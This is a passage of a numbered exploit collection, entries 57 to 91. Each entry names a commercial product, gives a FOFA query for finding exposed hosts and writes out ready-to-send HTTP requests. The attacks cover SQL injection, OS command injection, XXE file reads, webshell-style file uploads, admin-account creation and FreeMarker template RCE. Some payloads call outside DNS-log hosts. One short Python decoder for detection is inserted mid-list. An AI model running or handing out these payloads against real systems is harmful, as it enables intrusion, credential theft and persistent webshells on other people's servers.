        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"

POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, and type=exportexcelbysql selects the export-by-SQL handler that runs it.

GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Entsoft) customer resource management system fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The filename query parameter controls the stored name, so a .jsp extension is accepted as-is; the body is written verbatim as the file content.

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
The page parameter of the FlexPaper view.php helper is passed to a shell; the || operator appends an arbitrary command, here writing a marker file next to the script.

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the marker file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
The path parameter of the download action is not confined to the intended directory; ..%2Fconfig.ini reads the server's configuration file.

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 (EnjoyRMIS) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Time-based blind injection through the sId element of the GetOSpById SOAP operation: a vulnerable host answers about five seconds late.

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云 all-in-one face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
The addOperators function of SystemMng.ashx is reachable without a session. An HTTP 200 response means the operator account test123456 with password 123456 was created.

POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Whir (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hex form of HashBytes('MD5','102103122') that the UNION column returns), the injection is confirmed.

67. Whir (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the written file's name, dir sets the directory it is written to (relative, so ../ escapes the upload folder), and fileType sets the extension.

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Whir (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Time-based blind injection via recordId. The ;.js suffix is a path-parameter trick: the servlet container strips everything from the semicolon and still dispatches to wf_printnum.jsp, while a filter keyed on the raw extension sees a .js request.

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Whir (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Same ;.js path-parameter trick as entry 68; the injection point is gd_startUserCode, confirmed by the five-second delay.

GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Whir (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The SID header carries the command to run, base64-encoded: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini. The __VIEWSTATE value carries the payload itself (omitted here as PAYLOAD).

POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

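Entries 60 and 70 show why a signature that inspects only the raw parameter value misses these probes: the SQL in importexport.php's sql= parameter and the command in ezEIP's SID header both arrive base64-encoded, and other probes in this list (the %0a newline injection in entry 86, for instance) rely on a URL-encoding layer instead. The block below is an added example for this edit, not code from the source: it peels base64 and percent-encoding off a value one layer at a time, bounded so a crafted input cannot make it loop, and applies simple SQL and OS-command indicators to every layer. The indicator patterns are deliberately small and are assumptions for the demonstration, not a production ruleset.

```python
"""Peel encoding layers off request fields before matching them (added example)."""
import base64
import binascii
import re
from urllib.parse import unquote_plus

MAX_LAYERS = 4
_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Illustrative indicators only; a real ruleset is longer and tuned per application.
INDICATORS = {
    "sql": re.compile(r"\b(select|union|waitfor|hashbytes)\b|@@version|user\(\)", re.I),
    "oscmd": re.compile(r"(^|[\s;|&`])(type|cat|ping|ifconfig|ipconfig|whoami|curl|echo)\b|\$\{IFS\}", re.I),
}


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def _try_b64(value: str):
    """Return the decoded text if value is well-formed base64 of UTF-8 text, else None.
    Short or unpadded strings are rejected up front so ordinary words are not decoded."""
    if len(value) < 8 or len(value) % 4 or not _B64_SHAPE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if _is_text(text) else None


def decode_layers(value: str):
    """Return [raw, layer1, layer2, ...]; each entry is one more decoding step.
    Base64 is tried first, then percent-decoding; stop when neither changes the value."""
    layers = [value]
    for _ in range(MAX_LAYERS):
        current = layers[-1]
        nxt = _try_b64(current)
        if nxt is None:
            decoded = unquote_plus(current)
            nxt = decoded if decoded != current else None
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def classify(value: str):
    """Return the set of indicator names matched on any decoding layer of value."""
    hits = set()
    for layer in decode_layers(value):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return hits


# Constructed samples: the two encoded values from entries 60 and 70 above, the
# newline-injection host value from entry 86, and a benign string.
SAMPLES = {
    "sql param (entry 60)": "c2VsZWN0IDEsdXNlcigpLDM=",
    "SID header (entry 70)": "dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=",
    "host param (entry 86)": "%0acat${IFS}/etc/passwd%0a",
    "benign": "alice",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label}: layers={decode_layers(value)!r} hits={sorted(classify(value))}")
```

Decoding once per layer and stopping at a fixed depth matters: a matcher that percent-decodes repeatedly until the value stops changing will disagree with the application about what the value is, and that disagreement is itself a bypass.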
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
Time-based blind injection through accId on the pre-authentication login page.

GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
The xmlValue parameter is parsed with external entities enabled; the entity below reads c:\windows\win.ini and the Field element echoes it back.

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue URL-decodes to:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"

POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"

PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time parameter of setSyncTimeHost reaches a shell, so backtick command substitution runs ifconfig and writes its output under /cgi-bin/.

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
UnitCode is rendered through FreeMarker; the ?new() built-in instantiates freemarker.template.utility.Execute, and calling it runs the OS command. The command below writes a marker file into the ROOT web application so the result can be fetched over HTTP.

POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the marker file:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
The CuteSoft upload handler accepts a .aspx file and writes it to the folder named in the folder field.

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
The target field chooses the destination directory under the web root; the uploaded name is kept.

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) bandwidth-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
The path parameter of the webRead/open handler is passed to a shell; the pipe runs id.

GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达 (Superdata) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
The report parameter names the file to save and is not confined to the report directory; the request body becomes the file content.

POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then fetch the written file:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
Command 255 with an empty user name and login handle -1 is answered without authentication and returns account credentials.

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
The z2 field is interpolated into a shell command; the quoted "|id;" breaks out and runs id.

POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
The command to run is passed in the Cmd header; the JSON body (omitted as PAYLOAD) is the connection definition that triggers it.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 888
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered as a FreeMarker template before it is used; the same Execute ?new() construction as in entry 76 runs a command. Here the command is a curl to a DNS-log host, so success is confirmed by the callback rather than by the response.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The accountId parameter is used as a path, so ../../../tomcat/webapps places the uploaded archive into the servlet container's deployment directory. The exploit request below writes a Godzilla webshell (body omitted as PAYLOAD).

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
The host value is placed into a ping command line; %0a (newline) terminates the ping and starts a new command, and ${IFS} stands in for the space the filter strips.

POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
The suffix parameter is appended to the stored file name without validation, so /../../../jfhatuwe.php moves the upload to the web root and gives it a .php extension.

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php.

88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter reaches a shell; it decodes to a newline-delimited command that appends a PHP file to the web UI directory:
echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php

GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request the written file. The source lists /astdfkhl.php here, which does not match the name in the request above; use whatever name you put after the >> redirect (for the request as shown, /txzfsrur.php).

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The path ends in .js%70, which decodes to .jsp, so a filter matching the raw extension does not see a JSP request. The GUID value injects union select 111*222; the number 24642 in the response confirms it.

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
With jsondata[type]=99 the ping helper passes jsondata[ip] straight to the shell, so a command name in place of an address is executed.

POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
Two tricks combine here: the ..;/ segment is treated by the servlet container as .. plus a path parameter, so the request lands on /center/api/orgManage/v1/orgs/download even though a proxy matching the raw path saw /center/api/task/; and the fileName parameter is then used as a path without confinement.

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
